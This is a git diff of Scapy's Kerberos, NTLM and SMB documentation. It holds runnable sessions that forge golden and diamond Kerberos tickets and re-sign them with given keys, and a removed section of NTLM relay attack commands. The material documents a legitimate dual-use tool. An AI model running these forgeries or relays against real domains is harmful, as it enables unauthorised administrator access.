BooAPm9/kYAGYWIE/0sYqb9JVJe6DfDfy7iaXmQ8YGN2ZzV/zx2XtCQkDqdfzw0muxWQVRB/gNG8 + aCyQV/IqPvX7D1CtswupdbJQadOTv36yUi8jCRKsHmS7qTyRqnYKuxIJuxMT443d68rDJdJ775nW + YEXAl5m3ECCkT2S7tZxAVEkwT9lbjWvcbRfkdsuhiPMK0Eu2yR2RsCiwlTmGkpqftCsh9zAoyLof + QWxwYwAAAAAAAAABAAAAAQAAAAxET01BSU4uTE9DQUwAAAANQWRtaW5pc3RyYXRvcgAAAAAAAAAD + AAAADFgtQ0FDSEVDT05GOgAAABVrcmI1X2NjYWNoZV9jb25mX2RhdGEAAAAHcGFfdHlwZQAAACBr + cmJ0Z3QvRE9NQUlOLkxPQ0FMQERPTUFJTi5MT0NBTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + AAAAAAAAAAAAAAAAATIAAAAA + EOF + +.. code:: pycon + + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.open_file("krb.ccache") + >>> t.show() + Tickets: + 1. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + >>> t.edit_ticket(0) + Enter the NT hash (AES-256) for this ticket (as hex): 6df5a9a90cb076f4d232a123d9c24f46ae11590a5430710bc1881dca337989ce + >>> t.resign_ticket(0) + >>> t.save() + 1660 + >>> # Other stuff you can do + >>> tkt = t.dec_ticket(0) + >>> tkt + + >>> t.update_ticket(0, tkt) + +.. figure:: ../graphics/kerberos/ticketer.png + :align: center + + +.. note:: Remember to call ``resign_ticket`` to update the Server and KDC checksums in the PAC. + + +- **Request TGT/ST**: Scapy's ticketer also provides wrappers to :func:`~scapy.layers.kerberos.krb_as_req` and :func:`~scapy.layers.kerberos.krb_tgs_req`, in order to request a real ticket and store its result (typically called **diamond ticket**): + +.. code:: + + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.request_tgt("Administrator@DOMAIN.LOCAL") + Enter password: ************ + >>> t.show() + Tickets: + 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + >>> t.request_st(0, "host/dc1.domain.local") + >>> t.show() + Tickets: + 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + Start time End time Renew until Auth time + 31/08/23 11:38:34 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 + + 1. Administrator@DOMAIN.LOCAL -> host/dc1.domain.local@DOMAIN.LOCAL + Start time End time Renew until Auth time + 31/08/23 11:39:07 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 + >>> t.edit_ticket(1) + >>> t.resign_ticket(1) + >>> t.save(fname="req.ccache") + + +- **Renew TGT/ST**: Scapy's ticketer can be used to renew TGT or ST. + +.. code:: + + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.request_tgt("Administrator@DOMAIN.LOCAL") + Enter password: ************ + >>> t.request_st(0, "host/dc1.domain.local") + >>> t.show() + Tickets: + 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + Start time End time Renew until Auth time + 31/08/23 11:38:34 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 + + 1. Administrator@DOMAIN.LOCAL -> host/dc1.domain.local@DOMAIN.LOCAL + Start time End time Renew until Auth time + 31/08/23 11:39:07 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 + >>> t.renew(0) # renew TGT + >>> t.renew(1) # renew ST + +- **Craft tickets**: We can start by showing how to craft a **golden ticket**, in the same way impacket's ticketer does: + +.. code:: pycon + + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.create_ticket() + User [User]: Administrator + Domain [DOM.LOCAL]: DOMAIN.LOCAL + Domain SID [S-1-5-21-1-2-3]: S-1-5-21-4239584752-1119503303-314831486 + Group IDs [513, 512, 520, 518, 519]: 512, 520, 513, 519, 518 + User ID [500]: 500 + Primary Group ID [513]: + Extra SIDs [] :S-1-18-1 + Expires in (h) [10]: + What key should we use (AES128-CTS-HMAC-SHA1-96/AES256-CTS-HMAC-SHA1-96/RC4-HMAC) ? [AES256-CTS-HMAC-SHA1-96]: + Enter the NT hash (AES-256) for this ticket (as hex): 6df5a9a90cb076f4d232a123d9c24f46ae11590a5430710bc1881dca337989ce + >>> t.show() + Tickets: + 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + >>> t.save(fname="blob.ccache") + +Cheat sheet +----------- + ++-------------------------------------+--------------------------------+ +| Command | Description | ++=====================================+================================+ +| ``load_module("ticketer")`` | Load ticketer++ | ++-------------------------------------+--------------------------------+ +| ``t = Ticketer()`` | Create a Ticketer object | ++-------------------------------------+--------------------------------+ +| ``t.open_file("/tmp/krb5cc_1000")`` | Open a ccache file | ++-------------------------------------+--------------------------------+ +| ``t.save()`` | Save a ccache file | ++-------------------------------------+--------------------------------+ +| ``t.show()`` | List the tickets | ++-------------------------------------+--------------------------------+ +| ``t.create_ticket()`` | Forge a ticket | ++-------------------------------------+--------------------------------+ +| ``dTkt = t.dec_ticket()`` | Decipher a ticket | ++-------------------------------------+--------------------------------+ +| ``t.update_ticket(, dTkt)`` | Re-inject a deciphered ticket | ++-------------------------------------+--------------------------------+ +| ``t.edit_ticket()`` | Edit a ticket (GUI) | ++-------------------------------------+--------------------------------+ +| ``t.resign_ticket()`` | Resign a ticket | ++-------------------------------------+--------------------------------+ +| ``t.request_tgt(upn, [...])`` | Request a TGT | ++-------------------------------------+--------------------------------+ +| ``t.request_st(i, spn, [...])`` | Request a ST using ticket i | ++-------------------------------------+--------------------------------+ +| ``t.renew(i, [...])`` | Renew a TGT/ST | ++-------------------------------------+--------------------------------+ + Low-level _________ Decrypt kerberos packets ------------------------- +~~~~~~~~~~~~~~~~~~~~~~~~ Kerberos packets contain encrypted content, let's take the following packet: @@ -108,9 +394,9 @@ You likely want to decrypt ``pkt.root.padata[0].padataValue`` which is an :class >>> from scapy.libs.rfc3961 import Key, EncryptionType >>> enc = pkt[Kerberos].root.padata[0].padataValue - >>> k = Key(EncryptionType.AES256, key=hex_bytes("7fada4e566ae4fb270e2800a23ae87127a819d42e69b5e22de0ddc63da80096d")) + >>> k = Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=bytes.fromhex("7fada4e566ae4fb270e2800a23ae87127a819d42e69b5e22de0ddc63da80096d")) -The first parameter of the :class:`~scapy.libs.rfc3961.Key` constructor is a value from :class:`~scapy.libs.rfc3961.EncryptionType`, in this case ``EncryptionType.AES256``. This is the same value than ``enc.etype.val``, which allows to know which key to use. +The first parameter of the :class:`~scapy.libs.rfc3961.Key` constructor is a value from :class:`~scapy.libs.rfc3961.EncryptionType`, in this case ``EncryptionType.AES256_CTS_HMAC_SHA1_96``. This is the same value than ``enc.etype.val``, which allows to know which key to use. We can then proceed to perform the decryption: @@ -120,7 +406,7 @@ We can then proceed to perform the decryption: pausec=0x9a4db |> Compute Kerberos keys ---------------------- +~~~~~~~~~~~~~~~~~~~~~ .. note:: Encryption for Kerberos 5 is defined in `RFC3961 `_ @@ -141,7 +427,7 @@ Let's run a few examples: >>> # Get the AES256 key for User1@DOMAIN.LOCAL with "Password1" >>> from scapy.libs.rfc3961 import Key, EncryptionType - >>> Key.string_to_key(EncryptionType.AES256, b"Password1", b"DOMAIN.LOCALUser1") + >>> Key.string_to_key(EncryptionType.AES256_CTS_HMAC_SHA1_96, b"Password1", b"DOMAIN.LOCALUser1") >>> print(_.key) b'm\x07H\xc5F\xf4\xe9\x92\x05\xe7\x8f\x8d\xa7h\x1dN\xc5R\n\xe4\x81UCr\x0c*d|\x1a\xe8\x14\xc9' @@ -150,13 +436,13 @@ Let's run a few examples: .. code:: pycon >>> # Get the AES128 key for raeburn@ATHENA.MIT.EDU with "password", with an iteration count of 1200 - >>> k = Key.string_to_key(EncryptionType.AES128, b"password", b"ATHENA.MIT.EDUraeburn", struct.pack(">L", 1200)) - >>> print(bytes_hex(k.key)) - b'4c01cd46d632d01e6dbe230a01ed642a' + >>> k = Key.string_to_key(EncryptionType.AES128_CTS_HMAC_SHA1_96, b"password", b"ATHENA.MIT.EDUraeburn", struct.pack(">L", 1200)) + >>> print(k.key.hex()) + '4c01cd46d632d01e6dbe230a01ed642a' Decrypt FAST ------------- +~~~~~~~~~~~~ .. note:: Have a look at `RFC6113 `_ for Kerberos FAST @@ -165,11 +451,11 @@ Let's take a Kerberos AS-REQ packet with FAST armoring (RFC6113): .. figure:: ../graphics/kerberos/as_req_fast.png :align: center - FAST armoring in AS-REQ. Courtesy of Aurélien Bordes + FAST armoring in AS-REQ. Credit to `this paper by A. Bordes `_. .. code:: pycon - >>> pkt = Ether(hex_bytes(b'52540013d0835254003ea3be08004502089636a1400080063ad3c0a87fd2c0a87fc8fecc0058eea93069573b278e50180402897400000000086a6a82086630820862a103020105a20302010aa38207a23082079e3082079aa10402020088a28207900482078ca082078830820784a082064a30820646a003020101a182063d048206396e82063530820631a003020105a10302010ea20703050000000000a38205796182057530820571a003020105a10c1b0a444f4d312e4c4f43414ca21f301da003020102a11630141b066b72627467741b0a444f4d312e4c4f43414ca382053930820535a003020112a103020102a282052704820523acc8b7671c0d50522f1a8d8452ce450aceb40fff0229e8ee546bccf1512e4877ef93dde465595260a6a5a8e85ea38600ce8dff7d510f3c744e2c43eb9d3187d638f716c29b6e7aa9eb407de28d0161f49013966eda0a161ff174dad42e7aa500cfe298541215448013ffe4883b6b1166f908f50de129487fe77fff874fd4102cdcce8db8dbeb8da02f08cc88b3790cdad5ec499959c7e79d6fef107d1e17ce80cc3df050b7e7a1c31f278e4fd4ea9523c950876f174be363234f8495b9550de1560ba17daeafbf133f78991053d929ad3fd668327d42288e6581671daaef908682ee282e17c31d8f8bb55d27fce155ee2e84a2ff8bc9600891be15e6ede3e1bbd2742a7af8b0a32c48973c9e3776a69647bab11592756c5a15b9101c392efa35d000abb3dabccd97e64426e3fd8d47e0e369c83b5391f38947d536d351c061081d654eef1a3861cdb2ea2bc48222b450d1b7d09c0670493bccc60dfcaa5cfe46fd50adf8e388204a4691dc5f0c3dbae0b4da6ac2dd781f149a444840aaa3a3c3befb5a5c04ee0405baed66afcf9b988d10ea14a955f43df79465e6fc02a12bce3870988950f1ab48e1a4f876f351671c5061e6399a63cb0479f7bd017dfd9bc5be192faf6d4f11e6ee6003933eeaf632f0056c4c1ccd183d7977cfca85419fe5b039674419d802068e792c9576ae2a88bfbeb1f59273226782c6efb288717d8f7a4bc3bf4c697fcac1adc1829f0a914f2559b278ccadd108eb87a11dacc88e4302e9af627474e57171192b94c6b358f8f98e308596215d2fb9d9c2b49c4cbedcb43fc231b86f0493d56b82962cf3383a84f8922c2b99f8fa8fdd85797b09a6e60f72007c0379988be2ff1cfc16f21300c1b4b784174005a9185f760e68ef94b9384eb24decee31b63d1b92278cd75b85d4d80c4e83306533a9d95aa6207cbfbeb0970a41c44aba59839f007923ecd8ff0de8314990a435dbea4dedbee16faf5ab2be9f96d691cfa983a6c843bd183f84c1b4998a3eaa907cae6b82b0ae8363f3edd8cb03d3c9c60ff55a84d8a292ea20555fbd6ce5ad4ad7a6b4bc5bff2e02c477a7a8a98d5a387d389caa172c400b151d95871b2aa16a040dc71a9be5f0774b06a5ca87674ccb4109a2c41db9e3160704218ad495d0751194fbef4becae4d7be24b9d968da592256a2b22cf724e989e71a60d0603b59bebd475285f793794b7a18af49a2b68670e3a6247c453274e35c863a16b5023c6c94659e25abb27c760f989ac0bbf9a5b125d0ea34fb03225cc93d5b8b6829e906883ee76cf8ee61dfacc488e8dc5cbc8ba9705a9e915a68f838232394f97fb1aac4a2a90fe17d46f9c51946a2bf9598df7f5b5e7ee692a78860eea3cef748a5be36529228e40b4aec83ebc8bb14176a4c565b06500e9517229b8340c55812101dbbc6bee693c35873082a5a1a53b35cf3509193d4dc5175c9360a00da71692ba205b3264aecc9ecc8bca31fec43efc8701423bb484f6f21699439dd30f71228f16eaab96b7de3547721d1635bbfe50678900ac378a4958b6c34964f3e0dc843880dbde57fb4a76ab85eba2b190bfdaefc7ba17e109f839493b0f2d6fc7ea17403bebe06f2809314ca514606f54668082364ed6752019f27e1df74f93fcf1c25630a29713a89d4a998c444bc91279c6fc66e0aa5dec72be316e1160cf9f90d5915c464b6bfec5216e901be4726db596a15745511c63736a69ac9ecb9e86601c631b4992653c320e6983562fa613134560cb606621e9661ac5961313ee70868ab48d6010173d8a96fffdb2baf4afe18c846d3fed6f30b9a809d72e647735fc536edec543abc232480d28660395a4819e30819ba003020112a281930481901273d5af61ad426d51d0757e897917caeb6fc1b6950554e8d750f95d27f444e3aaf7ae0bf4595b5e906d9682dbdeedcf6eb42a84ab8092997b783f57710127228165deeb2ce5e09e2ddc71555dc31970a8312d888b8ae766382098276d62b4bd76f34cbc889e24ad5405ec037ceb724fdb71fe247fe2a414a037ed33c796f4475fcfb5993eed147b6d63d740d58da5b0a1173015a003020110a10e040ca75f26db2301c6970feba452a282011930820115a003020112a282010c048201083caf34ecefd84c786703c20039de61bc01ebed9be7e51c90a582fec852696bf92fd165cd5b5ef0f9b8edb666c9cca5690d364e5c6ad69e7d5bc7e055757aaa6206428a302524144d5d97cc0b64db13335045039171ed1f0d111ca1bd4651ebca3d74db029e5c6d3c7f8600c44e55b14cd3c7f6a15c9133400e4255d71f237bf288c186137cd04a5f2cabba3166de5bf11190a2e5962e4dbbfb9801e3be73ede5a536eb27a086b644f12245198459c063b8ecba228e1f9209e05a5bcbb39a12651e103438ee7998e666d8628812fa34bc07f4c4d0a4d86fe207128de37e1ffd169a4cb879cb5b9db8f9c3e86143bfd43409ca47e90f3bc848a1838fce7209f57296e44963a2d1e3d4a481af3081aca00703050040810010a11a3018a003020101a111300f1b0d61646d2d722d786d617274696ea2061b04444f4d31a3193017a003020102a110300e1b066b72627467741b04444f4d31a511180f32303337303931333032343830355aa611180f32303337303931333032343830355aa70602043f58a7a0a81530130201120201110201170201180202ff79020103a91d301b3019a003020114a112041053525620202020202020202020202020')) + >>> pkt = Ether(bytes.fromhex(b'52540013d0835254003ea3be08004502089636a1400080063ad3c0a87fd2c0a87fc8fecc0058eea93069573b278e50180402897400000000086a6a82086630820862a103020105a20302010aa38207a23082079e3082079aa10402020088a28207900482078ca082078830820784a082064a30820646a003020101a182063d048206396e82063530820631a003020105a10302010ea20703050000000000a38205796182057530820571a003020105a10c1b0a444f4d312e4c4f43414ca21f301da003020102a11630141b066b72627467741b0a444f4d312e4c4f43414ca382053930820535a003020112a103020102a282052704820523acc8b7671c0d50522f1a8d8452ce450aceb40fff0229e8ee546bccf1512e4877ef93dde465595260a6a5a8e85ea38600ce8dff7d510f3c744e2c43eb9d3187d638f716c29b6e7aa9eb407de28d0161f49013966eda0a161ff174dad42e7aa500cfe298541215448013ffe4883b6b1166f908f50de129487fe77fff874fd4102cdcce8db8dbeb8da02f08cc88b3790cdad5ec499959c7e79d6fef107d1e17ce80cc3df050b7e7a1c31f278e4fd4ea9523c950876f174be363234f8495b9550de1560ba17daeafbf133f78991053d929ad3fd668327d42288e6581671daaef908682ee282e17c31d8f8bb55d27fce155ee2e84a2ff8bc9600891be15e6ede3e1bbd2742a7af8b0a32c48973c9e3776a69647bab11592756c5a15b9101c392efa35d000abb3dabccd97e64426e3fd8d47e0e369c83b5391f38947d536d351c061081d654eef1a3861cdb2ea2bc48222b450d1b7d09c0670493bccc60dfcaa5cfe46fd50adf8e388204a4691dc5f0c3dbae0b4da6ac2dd781f149a444840aaa3a3c3befb5a5c04ee0405baed66afcf9b988d10ea14a955f43df79465e6fc02a12bce3870988950f1ab48e1a4f876f351671c5061e6399a63cb0479f7bd017dfd9bc5be192faf6d4f11e6ee6003933eeaf632f0056c4c1ccd183d7977cfca85419fe5b039674419d802068e792c9576ae2a88bfbeb1f59273226782c6efb288717d8f7a4bc3bf4c697fcac1adc1829f0a914f2559b278ccadd108eb87a11dacc88e4302e9af627474e57171192b94c6b358f8f98e308596215d2fb9d9c2b49c4cbedcb43fc231b86f0493d56b82962cf3383a84f8922c2b99f8fa8fdd85797b09a6e60f72007c0379988be2ff1cfc16f21300c1b4b784174005a9185f760e68ef94b9384eb24decee31b63d1b92278cd75b85d4d80c4e83306533a9d95aa6207cbfbeb0970a41c44aba59839f007923ecd8ff0de8314990a435dbea4dedbee16faf5ab2be9f96d691cfa983a6c843bd183f84c1b4998a3eaa907cae6b82b0ae8363f3edd8cb03d3c9c60ff55a84d8a292ea20555fbd6ce5ad4ad7a6b4bc5bff2e02c477a7a8a98d5a387d389caa172c400b151d95871b2aa16a040dc71a9be5f0774b06a5ca87674ccb4109a2c41db9e3160704218ad495d0751194fbef4becae4d7be24b9d968da592256a2b22cf724e989e71a60d0603b59bebd475285f793794b7a18af49a2b68670e3a6247c453274e35c863a16b5023c6c94659e25abb27c760f989ac0bbf9a5b125d0ea34fb03225cc93d5b8b6829e906883ee76cf8ee61dfacc488e8dc5cbc8ba9705a9e915a68f838232394f97fb1aac4a2a90fe17d46f9c51946a2bf9598df7f5b5e7ee692a78860eea3cef748a5be36529228e40b4aec83ebc8bb14176a4c565b06500e9517229b8340c55812101dbbc6bee693c35873082a5a1a53b35cf3509193d4dc5175c9360a00da71692ba205b3264aecc9ecc8bca31fec43efc8701423bb484f6f21699439dd30f71228f16eaab96b7de3547721d1635bbfe50678900ac378a4958b6c34964f3e0dc843880dbde57fb4a76ab85eba2b190bfdaefc7ba17e109f839493b0f2d6fc7ea17403bebe06f2809314ca514606f54668082364ed6752019f27e1df74f93fcf1c25630a29713a89d4a998c444bc91279c6fc66e0aa5dec72be316e1160cf9f90d5915c464b6bfec5216e901be4726db596a15745511c63736a69ac9ecb9e86601c631b4992653c320e6983562fa613134560cb606621e9661ac5961313ee70868ab48d6010173d8a96fffdb2baf4afe18c846d3fed6f30b9a809d72e647735fc536edec543abc232480d28660395a4819e30819ba003020112a281930481901273d5af61ad426d51d0757e897917caeb6fc1b6950554e8d750f95d27f444e3aaf7ae0bf4595b5e906d9682dbdeedcf6eb42a84ab8092997b783f57710127228165deeb2ce5e09e2ddc71555dc31970a8312d888b8ae766382098276d62b4bd76f34cbc889e24ad5405ec037ceb724fdb71fe247fe2a414a037ed33c796f4475fcfb5993eed147b6d63d740d58da5b0a1173015a003020110a10e040c75f02d8d2954e0ae1a9e0653a282011930820115a003020112a282010c04820108ae9bbc4629c80f4a383a69c4583824295c75f34b000b3fdbdaab073a042935e32c29e0ee2b2b446e4a6a2592362d0d593cddd74dacc24f16353776e1b5d192ad1cf5e63f66f40a134ecb87c077c30922bc0cab00ae23d187d56090d9098f843c54fabe7c012ff87e317dfe339c40911264609d489b041a4e9b52c0eb03ee88a393d17da92786bd1716b92eb0d7a5a24a64ade0870dea8a7e138acdf209ee277cb3fadeedab173fd64cc10a1004010774658b94852639bda10a5e8aff29174e3d2c7032c32631b074afdac0e6832bae74de9be19e522f63bc8499753a209291fee1861c29096cc8ee3cfda5be235b0aa95635916edcfcdaf90b896e2eaa5a57d5e4da0b00408f4201a481af3081aca00703050040810010a11a3018a003020101a111300f1b0d61646d2d302d66617374656e62a2061b04444f4d31a3193017a003020102a110300e1b066b72627467741b04444f4d31a511180f32303337303931333032343830355aa611180f32303337303931333032343830355aa70602043f58a7a0a81530130201120201110201170201180202ff79020103a91d301b3019a003020114a112041053525620202020202020202020202020')) >>> pkt[TCP].payload.show() ###[ KerberosTCPHeader ]### len = 2154 @@ -212,7 +498,7 @@ Let's take a Kerberos AS-REQ packet with FAST armoring (RFC6113): | | | | | | | kvno = None | | | | | | | cipher = \xed\x14{mc\xd7@\xd5\x8d\xa5\xb0']> | | | | checksumtype= 'HMAC-SHA1-96-AES256' 0x10 - | | | | checksum = + | | | | checksum = | | | | \encFastReq\ | | | | |###[ EncryptedData ]### | | | | | etype = 'AES-256' 0x12 @@ -224,7 +510,7 @@ Let's take a Kerberos AS-REQ packet with FAST armoring (RFC6113): | | \cname \ | | |###[ PrincipalName ]### | | | nameType = 'NT-PRINCIPAL' 0x1 - | | | nameString= [] + | | | nameString= [] | | realm = | | \sname \ | | |###[ PrincipalName ]### @@ -254,7 +540,7 @@ We have the krbtgt for this demo: >>> from scapy.libs.rfc3961 import Key, EncryptionType >>> krbtgt_hex = "ac67a63d7155791fe31dace230ab516e818c453dfdbd44cbe691b240725c4907" - >>> krbtgt = Key(EncryptionType.AES256, key=hex_bytes(krbtgt_hex)) + >>> krbtgt = Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=bytes.fromhex(krbtgt_hex)) We can therefore decrypt the first payload: @@ -285,7 +571,7 @@ We can therefore decrypt the first payload: addresses = None [...] -We can see the ticket session key in there, let's retrieve it and build a ``Key`` object: +We can see the ticket session key in there, let's retrieve it and build a :class:`~scapy.libs.rfc3961.Key` object: .. note:: We use the ``.toKey()`` function in the ``EncryptedKey`` type which is a shorthand for ``Key(, key=)`` @@ -363,7 +649,7 @@ That we can now use to decrypt the last payload: | \cname \ | |###[ PrincipalName ]### | | nameType = 'NT-PRINCIPAL' 0x1 - | | nameString= [] + | | nameString= [] | realm = | \sname \ | |###[ PrincipalName ]### @@ -382,7 +668,7 @@ That we can now use to decrypt the last payload: | additionalTickets= None Encryption ----------- +~~~~~~~~~~ A :func:`~scapy.libs.rfc3961.Key.encrypt` function exists in the :class:`~scapy.libs.rfc3961.Key` object in order to do the opposite of :func:`~scapy.libs.rfc3961.Key.decrypt`. @@ -396,7 +682,7 @@ For instance, during pre-authentication, encode ``PA-ENC-TIMESTAMP``: >>> # Create the PADATA layer with its EncryptedValue >>> pkt = PADATA(padataType=0x2, padataValue=EncryptedData()) >>> # Compute the key - >>> key = Key.string_to_key(EncryptionType.AES256, b"Password1", b"DOMAIN.LOCALUser1") + >>> key = Key.string_to_key(EncryptionType.AES256_CTS_HMAC_SHA1_96, b"Password1", b"DOMAIN.LOCALUser1") >>> now_time = datetime.now(timezone.utc).replace(microsecond=0) # Current time with no milliseconds >>> # Encrypt >>> pkt.padataValue.encrypt(key, PA_ENC_TS_ENC(patimestamp=ASN1_GENERALIZED_TIME(now_time))) diff --git a/doc/scapy/layers/ntlm.rst b/doc/scapy/layers/ntlm.rst index 6a2561e60ec..f7ac18483fd 100644 --- a/doc/scapy/layers/ntlm.rst +++ b/doc/scapy/layers/ntlm.rst @@ -2,127 +2,34 @@ NTLM ==== Scapy provides dissection & build methods for NTLM and other Windows mechanisms. -In particular, the ``ntlm_relay`` command allows to perform some NTLM relaying attacks. -.. note:: - - Read `this article from hackndo `_ to understand how NTLM relay work and what we are trying to achieve here. - -Examples --------- - - -**Requirement: Answer to all netbios requests with the local IP** - -.. code:: +How NTLM works +-------------- - netbios_announce(iface="virbr0") +NTLM is a legacy method of authentication that uses a `challenge-response mechanism `_. +The goal is to: -SMB <-> SMB: SMB relay with force downgrade to SMB1 -___________________________________________________ +- verify the identity of the client +- negotiate a common session key between the client and server .. note:: - ``server_kwargs={"REAL_HOSTNAME":"WIN1"}`` is compulsory on SMB1 if the name that you are spoofing is different from the real name. Set this to avoid getting a ``STATUS_DUPLICATE_NAME`` - -.. code:: - - ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_SMB_Client, iface="virbr0", ALLOW_SMB2=False, server_kwargs={"REAL_HOSTNAME":"WIN1"}) - -.. image:: ../graphics/ntlm/ntlmrelay_smb.png - :align: center - -.. image:: ../graphics/ntlm/ntlmrelay_smb_win1.png - :align: center - -.. image:: ../graphics/ntlm/ntlmrelay_smb_wireshark.png - :align: center - -.. image:: ../graphics/ntlm/ntlmrelay_smb_win2.png - :align: center - - -SMB <-> SMB: Perform a SMB2 relay - default -___________________________________________ - -.. code:: - - ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_SMB_Client, iface="virbr0") - -.. warning:: - - The legitimate client will the validity of the negotiated flags by using a signed IOCTL ``FSCTL_VALIDATE_NEGOTIATE_INFO`` which we cannot fake, therefore losing the connection. - We however still have created an authenticated illegitimate client to the server, where we won't be performing that check, that we can use. See the case right below. - -SMB <-> SMB: Perform a SMB2 relay - scripted -____________________________________________ - -Because of the note above, we now close the legitimate client & run commands on the server directly. - -.. note:: - - Setting ``ECHO`` to ``False`` on the server instantly terminates the connection once Authentication is successful. - We set ``RUN_SCRIPT`` to ``True`` to run a script (in ``DO_RUN_SCRIPT`` in the automaton) once Authentication is successful. Note that ``REAL_HOSTNAME`` is required in this case. - -.. code:: - - ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_SMB_Client, iface="virbr0", server_kwargs={"ECHO": False}, client_kwargs={"REAL_HOSTNAME": "WIN1", "RUN_SCRIPT": True}) - -.. image:: ../graphics/ntlm/ntlmrelay_smb2.png - :align: center - -SMB <-> SMB: SMB relay with force downgrade to SMB1 & drop NEGOEX -_________________________________________________________________ - -This example points out that the NEGOEX messages are optional: dropping them has no effect on the SMB1 connection. - -.. code:: - - ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_SMB_Client, iface="virbr0", ALLOW_SMB2=False, server_kwargs={"PASS_NEGOEX": False, "REAL_HOSTNAME":"WIN1"}) - -SMB <-> SMB: SMB relay with force downgrade to SMB1 & drop extended security -____________________________________________________________________________ - -This probably won't work. SMB1 clients abort unextended connections these days. - -.. code:: - - ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_SMB_Client, iface="virbr0", ALLOW_SMB2=False, server_kwargs={"REAL_HOSTNAME":"WIN1"}, DROP_EXTENDED_SECURITY=True) - -SMB2 <-> LDAP: relay SMB's NTLM to an LDAP server -_________________________________________________ - -.. note:: - - Negotiating LDAP using SMB's credentials does work, but sets the ``SIGN`` field during the NTLM exchange. This causes LDAP to require signing. Read `the HackNDo article ` for more info. - -.. code:: - - load_layer("ldap") - ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_LDAP_Client, iface="virbr0") - -.. image:: ../graphics/ntlm/ntlmrelay_ldap.png - :align: center - -Let's try using DROP-THE-MIC-v1 or DROP-THE-MIC-v2: - -.. code:: + We won't get in more details. You can read more in `this article from hackndo `_ to understand how NTLM works. - load_layer("ldap") - ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_LDAP_Client, iface="virbr0", DROP_MIC_v1=True) +NTLM in Scapy +------------- -.. code:: +Scapy implements `Security Providers `_ trying to stay as close a what you would find in the Windows world. - load_layer("ldap") - ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_LDAP_Client, iface="virbr0", DROP_MIC_v2=True) +Basically those are classes that implement two functions: -SMB2 <-> LDAPS: relay SMB's NTLM to an LDAPS server -___________________________________________________ +- ``GSS_Init_sec_context``: called by the client, passing it a ``Context`` and optionally a token +- ``GSS_Accept_sec_context``: called by the server, passing it a ``Context`` and optionally a token -.. code:: +They both return the updated Context, a token to optionally send to the server/client and a GSSAPI status code. - load_layer("ldap") - ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_LDAPS_Client, iface="virbr0") +For NTLM, this is implemented in the :class:`~scapy.layers.ntlm.NTLMSSP`. +You can typically use it in :class:`~scapy.layers.smbclient.SMB_Client`, :class:`~scapy.layers.smbserver.SMB_Server`, :class:`~scapy.layers.msrpce.rpcclient.DCERPC_Client` or :class:`~scapy.layers.msrpce.rpcserver.DCERPC_Server`. +Have a look at `SMB `_ and `DCE/RPC `_ to get examples on how to use it. -.. image:: ../graphics/ntlm/ntlmrelay_ldaps.png - :align: center +.. note:: Remember that you can wrap it in a :class:`~scapy.layers.spnego.SPNEGOSSP` diff --git a/doc/scapy/layers/smb.rst b/doc/scapy/layers/smb.rst new file mode 100644 index 00000000000..66d0e1fdfc8 --- /dev/null +++ b/doc/scapy/layers/smb.rst @@ -0,0 +1,291 @@ +SMB +=== + +Scapy provides pretty good support for SMB 2/3 and very partial support of SMB1. + +You can use the :class:`~scapy.layers.smb2.SMB2_Header` to dissect or build SMB2/3, or :class:`~scapy.layers.smb.SMB_Header` for SMB1. + +.. warning:: Encryption is currently not supported in neither the client nor server. + +SMB 2/3 client +-------------- + +Scapy provides a small SMB 2/3 client Automaton: :class:`~scapy.layers.smbclient.SMB_Client` + +.. image:: ../graphics/smb/smb_client.png + :align: center + + +Scapy's SMB client stack is as follows: + +- the :class:`~scapy.layers.smbclient.SMB_Client` Automaton handles the logic to bind, negotiate and establish the SMB session (eventually using Security Providers). +- This Automaton is wrapped into a :class:`~scapy.layers.smbclient.SMB_SOCKET` object which provides access to basic SMB commands such as open, read, write, close, etc. +- This socket is wrapped into a :class:`~scapy.layers.smbclient.smbclient` class which provides a high-level SMB client, with functions such as ``ls``, ``cd``, ``get``, ``put``, etc. + +You can access any of the 3 layers depending on how low-level you want to get. +We'll skip over the lowest one in this documentation, as it not really usable as an API, but note that this is where to look if you want to change SMB negotiation or session setup .(people wanting to use this are welcomed to have a look at the ``scapy/layers/smbclient.py`` code). + +High-Level :class:`~scapy.layers.smbclient.smbclient` +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +From the CLI +____________ + +Let's start by using :class:`~scapy.layers.smbclient.smbclient` from the Scapy CLI: + +.. code:: python + + >>> smbclient("server1.domain.local", "Administrator@domain.local") + Password: ************ + SMB authentication successful using SPNEGOSSP[KerberosSSP] ! + smb: \> shares + ShareName ShareType Comment + ADMIN$ DISKTREE Remote Admin + C$ DISKTREE Default share + IPC$ IPC Remote IPC + NETLOGON DISKTREE Logon server share + SYSVOL DISKTREE Logon server share + Users DISKTREE + common DISKTREE + smb: \> use c$ + smb: \> cd Program Files\Microsoft\ + smb: \Program Files\Microsoft> ls + FileName 